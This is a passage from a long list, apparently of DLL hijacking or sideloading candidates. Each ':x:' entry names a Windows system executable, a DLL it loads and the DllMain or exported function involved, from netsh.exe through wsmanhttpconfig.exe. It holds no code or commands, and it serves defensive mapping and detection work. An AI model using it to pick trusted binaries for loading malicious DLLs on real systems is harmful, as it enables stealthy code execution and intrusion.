:x: netsh.exe NSHIPSEC.DLL InitHelperDll
:x: netsh.exe NSHWFP.DLL DllMain
:x: netsh.exe NSHWFP.DLL InitHelperDll
:x: netsh.exe OneX.DLL DllMain
:x: netsh.exe P2P.dll DllMain
:x: netsh.exe P2PNETSH.DLL DllMain
:x: netsh.exe P2PNETSH.DLL InitHelperDll
:x: netsh.exe PEERDISTSH.DLL DllMain
:x: netsh.exe PEERDISTSH.DLL InitHelperDll
:x: netsh.exe POLSTORE.DLL DllMain
:x: netsh.exe POLSTORE.DLL IPSecOpenPolicyStore
:x: netsh.exe RASAPI32.dll DllMain
:x: netsh.exe rasman.dll DllMain
:x: netsh.exe RASMONTR.DLL DllMain
:x: netsh.exe RASMONTR.DLL InitHelperDll
:x: netsh.exe RMCLIENT.dll DllMain
:x: netsh.exe RPCNSH.DLL DllMain
:x: netsh.exe RPCNSH.DLL InitHelperDll
:x: netsh.exe SLC.dll DllMain
:x: netsh.exe SLC.dll SLRegisterWindowsEvent
:x: netsh.exe sppc.dll DllMain
:x: netsh.exe sppc.dll SLRegisterEvent
:x: netsh.exe SspiCli.dll DllMain
:x: netsh.exe USERENV.dll DllMain
:x: netsh.exe USERENV.dll RegisterGPNotification
:x: netsh.exe wcmapi.dll DllMain
:x: netsh.exe WCNNETSH.DLL DllMain
:x: netsh.exe WCNNETSH.DLL InitHelperDll
:x: netsh.exe wdi.dll DllMain
:x: netsh.exe wevtapi.dll DllMain
:x: netsh.exe WHHELPER.DLL DllMain
:x: netsh.exe WHHELPER.DLL InitHelperDll
:x: netsh.exe WINHTTP.dll DllMain
:x: netsh.exe WINIPSEC.DLL DllMain
:x: netsh.exe WINNSI.DLL DllMain
:x: netsh.exe wlanapi.dll DllMain
:x: netsh.exe WLANCFG.DLL DllMain
:x: netsh.exe WLANCFG.DLL InitHelperDll
:x: netsh.exe WSHELPER.DLL DllMain
:x: netsh.exe WSHELPER.DLL InitHelperDll
:x: netsh.exe WWANCFG.DLL DllMain
:x: netsh.exe WWANCFG.DLL InitHelperDll
:x: netsh.exe wwapi.dll DllMain
:x: netstat.exe IPHLPAPI.DLL DllMain
:x: netstat.exe IPHLPAPI.DLL InternalGetIfTable
:x: netstat.exe IPHLPAPI.DLL InternalGetTcpTable2
:x: netstat.exe snmpapi.dll DllMain
:x: netstat.exe snmpapi.dll SnmpTfxOpen
:x: ngciso.exe iumbase.DLL DllMain
:x: nltest.exe logoncli.dll DllMain
:x: nltest.exe netutils.dll DllMain
:x: nltest.exe NTDSAPI.dll DllMain
:x: nslookup.exe DNSAPI.dll DllMain
:x: nslookup.exe DNSAPI.dll DnsQueryConfigAllocEx
:x: omadmclient.exe DEVOBJ.dll DllMain
:x: omadmclient.exe DMCfgUtils.dll DllMain
:x: omadmclient.exe DMCmnUtils.dll DllMain
:x: omadmclient.exe dmEnrollEngine.DLL DllMain
:x: omadmclient.exe dmenterprisediagnostics.dll DllMain
:x: omadmclient.exe dmiso8601utils.dll DllMain
:x: omadmclient.exe DMOleAutUtils.dll DllMain
:x: omadmclient.exe dmxmlhelputils.dll DllMain
:x: omadmclient.exe IPHLPAPI.DLL DllMain
:x: omadmclient.exe iri.dll DllMain
:x: omadmclient.exe omadmapi.dll DllMain
:x: omadmclient.exe omadmapi.dll FreeCommandLineOptions
:x: omadmclient.exe omadmapi.dll OmaDmGetInternalAcctID
:x: omadmclient.exe omadmapi.dll ProcessCommandLine
:x: omadmclient.exe policymanager.dll DllMain
:x: omadmclient.exe USERENV.dll DllMain
:x: omadmclient.exe XmlLite.dll DllMain
:x: openfiles.exe netutils.dll DllMain
:x: openfiles.exe srvcli.dll DllMain
:x: openfiles.exe SspiCli.dll DllMain
:x: osk.exe AUDIOSES.DLL DllMain
:x: osk.exe AVRT.dll DllMain
:x: osk.exe DEVOBJ.dll DevObjCreateDeviceInfoList
:x: osk.exe DEVOBJ.dll DllMain
:x: osk.exe dwmapi.dll DllMain
:x: osk.exe dwmapi.dll DwmIsCompositionEnabled
:x: osk.exe dwmapi.dll DwmSetWindowAttribute
:x: osk.exe ksuser.dll DllMain
:x: osk.exe midimap.dll DllMain
:x: osk.exe midimap.dll DriverProc
:x: osk.exe MMDevAPI.DLL DllMain
:x: osk.exe MSACM32.dll acmGetVersion
:x: osk.exe MSACM32.dll DllMain
:x: osk.exe OLEACC.dll AccessibleObjectFromWindowTimeout
:x: osk.exe OLEACC.dll AccSetRunningUtilityState
:x: osk.exe OLEACC.dll DllMain
:x: osk.exe OLEACC.dll GetProcessHandleFromHwnd
:x: osk.exe OskSupport.dll DllMain
:x: osk.exe OskSupport.dll InitializeOSKSupport
:x: osk.exe OskSupport.dll UninitializeOSKSupport
:x: osk.exe WindowsCodecs.dll DllMain
:x: osk.exe WindowsCodecs.dll WICCreateImagingFactory_Proxy
:x: osk.exe WMsgAPI.dll DllMain
:x: pacjsworker.exe WINHTTP.dll DllMain
:x: packageinspector.exe msi.dll DllMain
:x: packageinspector.exe SLC.dll DllMain
:x: packageinspector.exe SLC.dll SLGetWindowsInformationDWORD
:x: packageinspector.exe sppc.dll DllMain
:x: packageinspector.exe wevtapi.dll DllMain
:x: pathping.exe IPHLPAPI.DLL DllMain
:x: pcalua.exe pcaui.dll DllMain
:x: pcalua.exe wer.dll DllMain
:x: pinenrollmentbroker.exe PROPSYS.dll DllMain
:x: pinenrollmentbroker.exe SspiCli.dll DllMain
:x: pktmon.exe mintdh.dll DllMain
:x: pktmon.exe mintdh.dll TdhpSetWbemExtensionBlock
:x: plasrv.exe Cabinet.dll DllMain
:x: plasrv.exe mintdh.dll DllMain
:x: plasrv.exe mintdh.dll TdhpSetWbemExtensionBlock
:x: plasrv.exe pdh.dll DllMain
:x: plasrv.exe tdh.dll DllMain
:x: plasrv.exe wevtapi.dll DllMain
:x: pnpunattend.exe dbgcore.DLL DllMain
:x: pnpunattend.exe DEVRTL.dll DllMain
:x: pnpunattend.exe newdev.dll DllMain
:x: pnpunattend.exe wdscore.dll ConstructPartialMsgVW
:x: pnpunattend.exe wdscore.dll CurrentIP
:x: pnpunattend.exe wdscore.dll DllMain
:x: pnpunattend.exe wdscore.dll WdsSetupLogDestroy
:x: pnpunattend.exe wdscore.dll WdsSetupLogInit
:x: pnpunattend.exe wdscore.dll WdsSetupLogMessageW
:x: presentationhost.exe CRYPTBASE.DLL DllMain
:x: presentationhost.exe mscoree.dll CorExitProcess
:x: presentationhost.exe mscoree.dll DllMain
:x: presentationhost.exe WININET.dll DllMain
:x: presentationsettings.exe SspiCli.dll DllMain
:x: presentationsettings.exe SspiCli.dll GetUserNameExW
:x: printbrmui.exe IPHLPAPI.DLL DllMain
:x: printbrmui.exe PROPSYS.dll DllMain
:x: psr.exe AEPIC.dll DllMain
:x: psr.exe CLDAPI.dll CfGetPlaceholderStateFromAttributeTag
:x: psr.exe CLDAPI.dll DllMain
:x: psr.exe FLTLIB.DLL DllMain
:x: psr.exe HID.DLL DllMain
:x: psr.exe msdrm.dll DllMain
:x: psr.exe OLEACC.dll DllMain
:x: psr.exe SspiCli.dll DllMain
:x: psr.exe SspiCli.dll GetUserNameExW
:x: psr.exe uireng.dll DllMain
:x: psr.exe uireng.dll UirInitializeEngine
:x: psr.exe XmlLite.dll DllMain
:x: query.exe logoncli.dll DllMain
:x: query.exe netutils.dll DllMain
:x: query.exe REGAPI.dll DllMain
:x: query.exe REGAPI.dll RegQueryUtilityCommandList
:x: query.exe samcli.dll DllMain
:x: query.exe srvcli.dll DllMain
:x: query.exe utildll.dll DllMain
:x: query.exe WINSTA.dll DllMain
:x: quickassist.exe ATL.DLL AtlComPtrAssign
:x: quickassist.exe ATL.DLL DllMain
:x: quickassist.exe CRYPTBASE.DLL DllMain
:x: quickassist.exe CRYPTBASE.DLL SystemFunction036
:x: quickassist.exe d2d1.dll DllMain
:x: quickassist.exe d3d11.dll DllMain
:x: quickassist.exe dcomp.dll DllMain
:x: quickassist.exe dxgi.dll DllMain
:x: quickassist.exe PROPSYS.dll DllMain
:x: quickassist.exe PROPSYS.dll VariantToStringWithDefault
:x: quickassist.exe SAS.dll DllMain
:x: quickassist.exe SspiCli.dll AcquireCredentialsHandleA
:x: quickassist.exe SspiCli.dll DllMain
:x: quickassist.exe SspiCli.dll GetUserNameExA
:x: quickassist.exe SspiCli.dll GetUserNameExW
:x: quickassist.exe SspiCli.dll InitializeSecurityContextA
:x: quickassist.exe SspiCli.dll QueryContextAttributesExA
:x: quickassist.exe UxTheme.dll DllMain
:x: quickassist.exe UxTheme.dll SetWindowThemeAttribute
:x: quickassist.exe WindowsCodecs.dll DllMain
:x: quickassist.exe WININET.dll AppCacheGetGroupList
:x: quickassist.exe WININET.dll DllMain
:x: quickassist.exe WININET.dll InternetInitializeAutoProxyDll
:x: quickassist.exe WININET.dll InternetOpenW
:x: quickassist.exe WININET.dll InternetSetOptionW
:x: quser.exe logoncli.dll DllMain
:x: quser.exe netutils.dll DllMain
:x: quser.exe samcli.dll DllMain
:x: quser.exe srvcli.dll DllMain
:x: quser.exe UTILDLL.dll DllMain
:x: quser.exe UTILDLL.dll StrConnectState
:x: quser.exe WINSTA.dll DllMain
:x: quser.exe WINSTA.dll WinStationEnumerateW
:x: qwinsta.exe logoncli.dll DllMain
:x: qwinsta.exe netutils.dll DllMain
:x: qwinsta.exe samcli.dll DllMain
:x: qwinsta.exe srvcli.dll DllMain
:x: qwinsta.exe UTILDLL.dll DllMain
:x: qwinsta.exe UTILDLL.dll StrConnectState
:x: qwinsta.exe WINSTA.dll DllMain
:x: qwinsta.exe WINSTA.dll WinStationEnumerateW
:x: rasautou.exe MPRAPI.dll DllMain
:x: rasautou.exe rasman.dll DllMain
:x: rasautou.exe rtutils.dll DllMain
:x: rasdial.exe RASAPI32.dll DllMain
:x: rasdial.exe RASAPI32.dll RasCompleteDialMachineCleanup
:x: rasdial.exe RASAPI32.dll RasEnumConnectionsW
:x: rasdial.exe rasman.dll DllMain
:x: rasdial.exe rasman.dll RasConnectionEnum
:x: rasdial.exe rasman.dll RasInitialize
:x: rasdial.exe rtutils.dll DllMain
:x: rasdial.exe rtutils.dll TracePrintfExA
:x: rasdial.exe rtutils.dll TraceRegisterExA
:x: raserver.exe netutils.dll DllMain
:x: raserver.exe samcli.dll DllMain
:x: raserver.exe WTSAPI32.dll DllMain
:x: rdpclip.exe CRYPTBASE.DLL DllMain
:x: rdpclip.exe DEVOBJ.dll DevObjCreateDeviceInfoList
:x: rdpclip.exe DEVOBJ.dll DevObjDestroyDeviceInfoList
:x: rdpclip.exe DEVOBJ.dll DevObjEnumDeviceInfo
:x: rdpclip.exe DEVOBJ.dll DevObjEnumDeviceInterfaces
:x: rdpclip.exe DEVOBJ.dll DevObjGetClassDevs
:x: rdpclip.exe DEVOBJ.dll DevObjGetDeviceInfoListDetail
:x: rdpclip.exe DEVOBJ.dll DevObjGetDeviceInterfaceDetail
:x: rdpclip.exe DEVOBJ.dll DllMain
:x: rdpclip.exe dwmapi.dll DllMain
:x: rdpclip.exe IPHLPAPI.DLL DllMain
:x: rdpclip.exe PROPSYS.dll DllMain
:x: rdpclip.exe srpapi.dll DllMain
:x: rdpclip.exe WINSTA.dll DllMain
:x: rdpclip.exe WINSTA.dll WinStationNameFromLogonIdW
:x: rdpclip.exe WINSTA.dll WinStationQueryInformationW
:x: rdpclip.exe WINSTA.dll WinStationRegisterConsoleNotification
:x: rdpclip.exe WINSTA.dll WinStationVirtualOpenEx
:x: rdpclip.exe WTSAPI32.dll DllMain
:x: rdpclip.exe WTSAPI32.dll WTSQuerySessionInformationW
:x: rdpclip.exe WTSAPI32.dll WTSRegisterSessionNotification
:x: rdpclip.exe WTSAPI32.dll WTSVirtualChannelOpen
:x: rdpclip.exe WTSAPI32.dll WTSVirtualChannelOpenEx
:x: rdpsa.exe SspiCli.dll DllMain
:x: rdpsa.exe WINSTA.dll DllMain
:x: rdpsauachelper.exe WINSTA.dll DllMain
:x: rdpsauachelper.exe WINSTA.dll WinStationGetAllProcesses
:x: rdpshell.exe dwmapi.dll DllMain
:x: rdpshell.exe WINSTA.dll DllMain
:x: rdpshell.exe WINSTA.dll WinStationGetConnectionProperty
:x: rdpshell.exe WTSAPI32.dll DllMain
:x: rdvghelper.exe dwmapi.dll DllMain
:x: rdvghelper.exe WINSTA.dll DllMain
:x: rdvghelper.exe WINSTA.dll WinStationRegisterConsoleNotification
:x: rdvghelper.exe WTSAPI32.dll DllMain
:x: rdvghelper.exe WTSAPI32.dll WTSRegisterSessionNotification
:x: reagentc.exe Cabinet.dll DllMain
:x: reagentc.exe ReAgent.dll DllMain
:x: reagentc.exe ReAgent.dll WinReGetError
:x: reagentc.exe ReAgent.dll WinReSetError
:x: recover.exe DEVOBJ.dll DllMain
:x: register-cimprovider.exe miutils.dll DllMain
:x: register-cimprovider.exe prvdmofcomp.dll CreateRegisterParameter
:x: register-cimprovider.exe prvdmofcomp.dll DllMain
:x: rekeywiz.exe credui.dll DllMain
:x: rekeywiz.exe CRYPTBASE.DLL DllMain
:x: rekeywiz.exe CRYPTUI.dll DllMain
:x: rekeywiz.exe DSROLE.dll DllMain
:x: rekeywiz.exe DSROLE.dll DsRoleGetPrimaryDomainInformation
:x: rekeywiz.exe duser.dll DllMain
:x: rekeywiz.exe EFSADU.dll DllMain
:x: rekeywiz.exe EFSUTIL.dll DllMain
:x: rekeywiz.exe EFSUTIL.dll EfsUtilApplyGroupPolicy
:x: rekeywiz.exe FeClient.dll DllMain
:x: rekeywiz.exe logoncli.dll DllMain
:x: rekeywiz.exe netutils.dll DllMain
:x: rekeywiz.exe USERENV.dll DllMain
:x: rekeywiz.exe VAULTCLI.dll DllMain
:x: relog.exe pdh.dll DllMain
:x: relpost.exe Cabinet.dll DllMain
:x: relpost.exe ReAgent.dll DllMain
:x: relpost.exe wer.dll DllMain
:x: repair-bde.exe BDEREPAIR.dll DllMain
:x: reset.exe logoncli.dll DllMain
:x: reset.exe netutils.dll DllMain
:x: reset.exe REGAPI.dll DllMain
:x: reset.exe REGAPI.dll RegQueryUtilityCommandList
:x: reset.exe samcli.dll DllMain
:x: reset.exe srvcli.dll DllMain
:x: reset.exe utildll.dll DllMain
:x: reset.exe WINSTA.dll DllMain
:x: resetengine.exe bcd.dll DllMain
:x: resetengine.exe Cabinet.dll DllMain
:x: resetengine.exe DismApi.DLL DllMain
:x: resetengine.exe FVEAPI.dll DllMain
:x: resetengine.exe ReAgent.dll DllMain
:x: resetengine.exe ResetEngine.dll DllMain
:x: resetengine.exe tbs.dll DllMain
:x: resetengine.exe VSSAPI.DLL DllMain
:x: resetengine.exe VssTrace.DLL DllMain
:x: resetengine.exe WDSCORE.dll DllMain
:x: resetengine.exe WIMGAPI.DLL DllMain
:x: resetengine.exe WINHTTP.dll DllMain
:x: resetengine.exe WOFUTIL.dll DllMain
:x: resetengine.exe XmlLite.dll DllMain
:x: resmon.exe CLDAPI.dll CfGetPlaceholderStateFromAttributeTag
:x: resmon.exe CLDAPI.dll DllMain
:x: resmon.exe CRYPTBASE.DLL DllMain
:x: resmon.exe edputil.dll DllMain
:x: resmon.exe edputil.dll EdpGetIsManaged
:x: resmon.exe FLTLIB.DLL DllMain
:x: resmon.exe PROPSYS.dll DllMain
:x: resmon.exe PROPSYS.dll PSCreateMemoryPropertyStore
:x: resmon.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:x: rmactivate_isv.exe msdrm.dll __AddMachineCertToLicenseStore
:x: rmactivate_isv.exe msdrm.dll DllMain
:x: rmactivate_ssp_isv.exe CRYPTBASE.dll DllMain
:x: rmactivate_ssp_isv.exe CRYPTBASE.dll SystemFunction036
:x: rmactivate.exe CRYPTBASE.dll DllMain
:x: rmactivate.exe CRYPTBASE.dll SystemFunction036
:x: rmactivate.exe msdrm.dll __AddMachineCertToLicenseStore
:x: rmactivate.exe msdrm.dll DllMain
:x: rmttpmvscmgrsvr.exe DEVOBJ.dll DllMain
:x: route.exe IPHLPAPI.DLL DllMain
:x: rpcping.exe credui.dll DllMain
:x: rpcping.exe SspiCli.dll DllMain
:x: rpcping.exe WINHTTP.dll DllMain
:x: rwinsta.exe logoncli.dll DllMain
:x: rwinsta.exe netutils.dll DllMain
:x: rwinsta.exe samcli.dll DllMain
:x: rwinsta.exe srvcli.dll DllMain
:x: rwinsta.exe utildll.dll DllMain
:x: rwinsta.exe WINSTA.dll DllMain
:x: searchfilterhost.exe TQUERY.DLL DllMain
:x: secedit.exe SCECLI.dll DllMain
:x: securityhealthservice.exe DNSAPI.dll DllMain
:x: securityhealthservice.exe FirewallAPI.dll DllMain
:x: securityhealthservice.exe fwbase.dll DllMain
:x: securityhealthservice.exe fwbase.dll FwCriticalSectionCreate
:x: securityhealthservice.exe fwbase.dll FwCriticalSectionDestroy
:x: securityhealthservice.exe USERENV.dll DllMain
:x: securityhealthservice.exe Wldp.dll DllMain
:x: securityhealthservice.exe WTSAPI32.dll DllMain
:x: settingsynchost.exe policymanager.dll DllMain
:x: settingsynchost.exe PROPSYS.dll DllMain
:x: settingsynchost.exe USERENV.dll DllMain
:x: setupugc.exe dbgcore.DLL DllMain
:x: setupugc.exe DNSAPI.dll DllMain
:x: setupugc.exe WDSCORE.dll ConstructPartialMsgVW
:x: setupugc.exe WDSCORE.dll CurrentIP
:x: setupugc.exe WDSCORE.dll DllMain
:x: setupugc.exe WDSCORE.dll WdsSetupLogDestroy
:x: setupugc.exe WDSCORE.dll WdsSetupLogInit
:x: setupugc.exe WDSCORE.dll WdsSetupLogMessageW
:x: shutdown.exe SspiCli.dll DllMain
:x: slidetoshutdown.exe d3d10warp.dll DllMain
:x: slidetoshutdown.exe d3d10warp.dll OpenAdapter10_2
:x: slui.exe CLDAPI.dll CfGetPlaceholderStateFromAttributeTag
:x: slui.exe CLDAPI.dll DllMain
:x: slui.exe CRYPTBASE.DLL DllMain
:x: slui.exe edputil.dll DllMain
:x: slui.exe edputil.dll EdpGetIsManaged
:x: slui.exe FLTLIB.DLL DllMain
:x: slui.exe PROPSYS.dll DllMain
:x: slui.exe PROPSYS.dll PSCreateMemoryPropertyStore
:x: slui.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:x: slui.exe sppc.dll DllMain
:x: slui.exe WINBRAND.dll DllMain
:x: slui.exe WTSAPI32.dll DllMain
:x: spaceagent.exe NETUTILS.DLL DllMain
:x: spaceagent.exe SRVCLI.DLL DllMain
:x: spectrum.exe SpectrumSyncClient.dll DllMain
:x: spoolsv.exe DNSAPI.dll DllMain
:x: sppextcomobj.exe adsldpc.dll DllMain
:x: sppextcomobj.exe CRYPTBASE.dll DllMain
:x: sppextcomobj.exe CRYPTBASE.dll SystemFunction036
:x: sppextcomobj.exe DNSAPI.dll DllMain
:x: sppsvc.exe CRYPTXML.dll DllMain
:x: sppsvc.exe webservices.dll DllMain
:x: sppsvc.exe XmlLite.dll DllMain
:x: srtasks.exe bcd.dll DllMain
:x: srtasks.exe ktmw32.dll DllMain
:x: srtasks.exe SPP.dll DllMain
:x: srtasks.exe SRCLIENT.dll DllMain
:x: srtasks.exe SRCORE.dll DllMain
:x: srtasks.exe VSSAPI.DLL DllMain
:x: srtasks.exe VssTrace.DLL DllMain
:x: srtasks.exe wer.dll DllMain
:x: stordiag.exe CRYPTBASE.dll DllMain
:x: stordiag.exe CRYPTBASE.dll SystemFunction036
:x: synchost.exe PROPSYS.dll DllMain
:x: sysreseterr.exe WDSCORE.dll DllMain
:x: systeminfo.exe SspiCli.dll DllMain
:x: tabcal.exe DEVOBJ.dll DevObjCreateDeviceInfoList
:x: tabcal.exe DEVOBJ.dll DevObjDestroyDeviceInfoList
:x: tabcal.exe DEVOBJ.dll DevObjEnumDeviceInfo
:x: tabcal.exe DEVOBJ.dll DevObjEnumDeviceInterfaces
:x: tabcal.exe DEVOBJ.dll DevObjGetClassDevs
:x: tabcal.exe DEVOBJ.dll DevObjGetDeviceInfoListDetail
:x: tabcal.exe DEVOBJ.dll DevObjGetDeviceInterfaceDetail
:x: tabcal.exe DEVOBJ.dll DllMain
:x: tabcal.exe HID.DLL DllMain
:x: tabcal.exe HID.DLL HidD_GetHidGuid
:x: tabcal.exe NInput.dll DllMain
:x: takeown.exe SspiCli.dll DllMain
:x: tapiunattend.exe WDSCORE.dll ConstructPartialMsgVW
:x: tapiunattend.exe WDSCORE.dll CurrentIP
:x: tapiunattend.exe WDSCORE.dll DllMain
:x: tapiunattend.exe WDSCORE.dll WdsSetupLogMessageW
:x: tar.exe archiveint.dll archive_match_new
:x: tar.exe archiveint.dll DllMain
:x: taskkill.exe dbghelp.dll DllMain
:x: taskkill.exe netutils.dll DllMain
:x: taskkill.exe srvcli.dll DllMain
:x: taskkill.exe SspiCli.dll DllMain
:x: tasklist.exe dbghelp.dll DllMain
:x: tasklist.exe netutils.dll DllMain
:x: tasklist.exe srvcli.dll DllMain
:x: tasklist.exe SspiCli.dll DllMain
:x: tieringengineservice.exe CLUSAPI.dll DllMain
:x: tieringengineservice.exe DNSAPI.dll DllMain
:x: tieringengineservice.exe ESENT.dll DllMain
:x: tracert.exe IPHLPAPI.DLL DllMain
:x: tscon.exe logoncli.dll DllMain
:x: tscon.exe netutils.dll DllMain
:x: tscon.exe samcli.dll DllMain
:x: tscon.exe srvcli.dll DllMain
:x: tscon.exe utildll.dll DllMain
:x: tscon.exe WINSTA.dll DllMain
:x: tsdiscon.exe WINSTA.dll DllMain
:x: tsdiscon.exe WINSTA.dll WinStationNameFromLogonIdW
:x: tskill.exe logoncli.dll DllMain
:x: tskill.exe netutils.dll DllMain
:x: tskill.exe samcli.dll DllMain
:x: tskill.exe srvcli.dll DllMain
:x: tskill.exe utildll.dll DllMain
:x: tskill.exe WINSTA.dll DllMain
:x: tttracer.exe TTDRecord.dll DllMain
:x: tttracer.exe USERENV.dll DllMain
:x: typeperf.exe pdh.dll DllMain
:x: tzsync.exe CRYPTBASE.dll DllMain
:x: tzsync.exe CRYPTBASE.dll SystemFunction036
:x: uevappmonitor.exe CRYPTBASE.dll DllMain
:x: uevappmonitor.exe CRYPTBASE.dll SystemFunction036
:x: unlodctr.exe loadperf.dll DllMain
:x: upfc.exe XmlLite.dll DllMain
:x: upgraderesultsui.exe DMCmnUtils.dll DllMain
:x: useraccountcontrolsettings.exe CRYPTBASE.dll DllMain
:x: useraccountcontrolsettings.exe CRYPTBASE.dll SystemFunction036
:x: usocoreworker.exe Cabinet.dll DllMain
:x: usocoreworker.exe DMCmnUtils.dll DllMain
:x: usocoreworker.exe dmiso8601utils.dll DllMain
:x: usocoreworker.exe DMOleAutUtils.dll DllMain
:x: usocoreworker.exe iri.dll DllMain
:x: usocoreworker.exe omadmapi.dll DllMain
:x: usocoreworker.exe UpdatePolicy.dll DllMain
:x: usocoreworker.exe XmlLite.dll DllMain
:x: utcdecoderhost.exe USERENV.dll DllMain
:x: utilman.exe OLEACC.dll DllMain
:x: vaultcmd.exe VAULTCLI.dll DllMain
:x: vds.exe ATL.DLL AtlModuleInit
:x: vds.exe ATL.DLL AtlModuleTerm
:x: vds.exe ATL.DLL DllMain
:x: vds.exe bcd.dll DllMain
:x: vds.exe OSUNINST.dll DllMain
:x: vdsldr.exe ATL.DLL AtlModuleInit
:x: vdsldr.exe ATL.DLL AtlModuleRegisterClassObjects
:x: vdsldr.exe ATL.DLL DllMain
:x: vdsldr.exe bcd.dll DllMain
:x: vssadmin.exe ATL.DLL DllMain
:x: vssadmin.exe VSSAPI.DLL DllMain
:x: vssadmin.exe VssTrace.DLL DllMain
:x: vssadmin.exe VssTrace.DLL VssGetTracingContextPerThread
:x: vssadmin.exe VssTrace.DLL VssIsTracingEnabled
:x: vssadmin.exe VssTrace.DLL VssSetTracingContextPerThread
:x: vssadmin.exe VssTrace.DLL VssTraceInitialize
:x: vssadmin.exe VssTrace.DLL VssTraceUninitialize
:x: vssvc.exe AUTHZ.dll DllMain
:x: vssvc.exe bcd.dll DllMain
:x: vssvc.exe DEVOBJ.dll DllMain
:x: vssvc.exe FLTLIB.DLL DllMain
:x: vssvc.exe VirtDisk.dll DllMain
:x: vssvc.exe VSSAPI.DLL DllMain
:x: vssvc.exe VssTrace.DLL DllMain
:x: vssvc.exe VssTrace.DLL VssGetTracingContextPerThread
:x: vssvc.exe VssTrace.DLL VssIsTracingEnabled
:x: vssvc.exe VssTrace.DLL VssSetTracingContextPerThread
:x: vssvc.exe VssTrace.DLL VssTraceInitialize
:x: vssvc.exe VssTrace.DLL VssTraceUninitialize
:x: w32tm.exe IPHLPAPI.DLL DllMain
:x: w32tm.exe logoncli.dll DllMain
:x: w32tm.exe netutils.dll DllMain
:x: w32tm.exe NTDSAPI.dll DllMain
:x: waitfor.exe netutils.dll DllMain
:x: waitfor.exe srvcli.dll DllMain
:x: waitfor.exe SspiCli.dll DllMain
:x: wbadmin.exe credui.dll DllMain
:x: wbengine.exe bcd.dll DllMain
:x: wbengine.exe CLUSAPI.dll DllMain
:x: wbengine.exe DNSAPI.dll DllMain
:x: wbengine.exe FLTLIB.DLL DllMain
:x: wbengine.exe NETUTILS.DLL DllMain
:x: wbengine.exe SPP.dll DllMain
:x: wbengine.exe SRVCLI.DLL DllMain
:x: wbengine.exe VirtDisk.dll DllMain
:x: wbengine.exe VSSAPI.DLL DllMain
:x: wbengine.exe VssTrace.DLL DllMain
:x: wbengine.exe wer.dll DllMain
:x: wbengine.exe XmlLite.dll DllMain
:x: wecutil.exe WecApi.dll DllMain
:x: wecutil.exe wevtapi.dll DllMain
:x: werfault.exe dbgcore.DLL DllMain
:x: werfault.exe faultrep.dll DllMain
:x: werfault.exe wer.dll DllMain
:x: werfault.exe wer.dll WerpSetExitListeners
:x: werfaultsecure.exe dbgcore.DLL DllMain
:x: werfaultsecure.exe faultrep.dll DllMain
:x: werfaultsecure.exe wer.dll DllMain
:x: werfaultsecure.exe wer.dll WerpSetExitListeners
:x: wermgr.exe wer.dll DllMain
:x: wermgr.exe wer.dll WerpSetExitListeners
:x: wextract.exe Cabinet.dll DllMain
:x: wfs.exe ATL.DLL DllMain
:x: wfs.exe credui.dll DllMain
:x: wfs.exe IPHLPAPI.DLL DllMain
:x: wfs.exe PROPSYS.dll DllMain
:x: wfs.exe UxTheme.dll DllMain
:x: whoami.exe AUTHZ.dll DllMain
:x: whoami.exe netutils.dll DllMain
:x: whoami.exe SspiCli.dll DllMain
:x: whoami.exe wkscli.dll DllMain
:x: wiaacmgr.exe ScanSetting.DLL DllMain
:x: wiaacmgr.exe UxTheme.dll DllMain
:x: wiawow64.exe ScanSetting.DLL DllMain
:x: wiawow64.exe UxTheme.dll DllMain
:x: wifitask.exe HTTPAPI.dll DllMain
:x: wifitask.exe IPHLPAPI.DLL DllMain
:x: wifitask.exe webservices.dll DllMain
:x: wifitask.exe wlanapi.dll DllMain
:x: wimserv.exe Cabinet.dll DllMain
:x: winlogon.exe UXINIT.dll DllMain
:x: winlogon.exe UXINIT.dll ThemesOnTerminateSession
:x: winrs.exe DSROLE.dll DllMain
:x: winrs.exe mi.dll DllMain
:x: winrs.exe miutils.dll DllMain
:x: wkspbroker.exe credui.dll DllMain
:x: wkspbroker.exe DNSAPI.dll DllMain
:x: wkspbroker.exe ktmw32.dll DllMain
:x: wkspbroker.exe PROPSYS.dll DllMain
:x: wkspbroker.exe RADCUI.dll DllMain
:x: wkspbroker.exe SspiCli.dll DllMain
:x: wkspbroker.exe tsworkspace.dll DllMain
:x: wkspbroker.exe WINHTTP.dll DllMain
:x: wkspbroker.exe WININET.dll DllMain
:x: wksprt.exe webservices.dll DllMain
:x: wksprt.exe WININET.dll DllMain
:x: wlrmdr.exe SspiCli.dll DllMain
:x: wmpdmc.exe dwmapi.dll DllMain
:x: wmpdmc.exe OLEACC.dll DllMain
:x: wmpdmc.exe UxTheme.dll DllMain
:x: wmpdmc.exe WindowsCodecs.dll DllMain
:x: wmpdmc.exe wmpdui.dll DllMain
:x: workfolders.exe CLDAPI.dll CfGetPlaceholderStateFromAttributeTag
:x: workfolders.exe CLDAPI.dll DllMain
:x: workfolders.exe CRYPTBASE.DLL DllMain
:x: workfolders.exe DEVOBJ.dll DllMain
:x: workfolders.exe dmEnrollEngine.DLL DllMain
:x: workfolders.exe edputil.dll DllMain
:x: workfolders.exe edputil.dll EdpGetIsManaged
:x: workfolders.exe FLTLIB.DLL DllMain
:x: workfolders.exe policymanager.dll DllMain
:x: workfolders.exe PROPSYS.dll DllMain
:x: workfolders.exe PROPSYS.dll PSCreateMemoryPropertyStore
:x: workfolders.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:x: workfolders.exe USERENV.dll DllMain
:x: workfolders.exe USERENV.dll GetProfileType
:x: wowreg32.exe devrtl.DLL DllMain
:x: wpcmon.exe samcli.dll DllMain
:x: wpcmon.exe USERENV.dll DllMain
:x: wpnpinst.exe Cabinet.dll DllMain
:x: wpnpinst.exe IPHLPAPI.DLL DllMain
:x: wpnpinst.exe PROPSYS.dll DllMain
:x: wpr.exe WindowsPerformanceRecorderControl.dll DllMain
:x: write.exe CLDAPI.dll CfGetPlaceholderStateFromAttributeTag
:x: write.exe CLDAPI.dll DllMain
:x: write.exe CRYPTBASE.DLL DllMain
:x: write.exe edputil.dll DllMain
:x: write.exe edputil.dll EdpGetIsManaged
:x: write.exe FLTLIB.DLL DllMain
:x: write.exe PROPSYS.dll DllMain
:x: write.exe PROPSYS.dll PSCreateMemoryPropertyStore
:x: write.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:x: wscadminui.exe CRYPTBASE.DLL DllMain
:x: wsmanhttpconfig.exe DSROLE.dll DllMain
:x: wsmanhttpconfig.exe HTTPAPI.dll DllMain
:x: wsmanhttpconfig.exe HTTPAPI.dll HttpInitialize
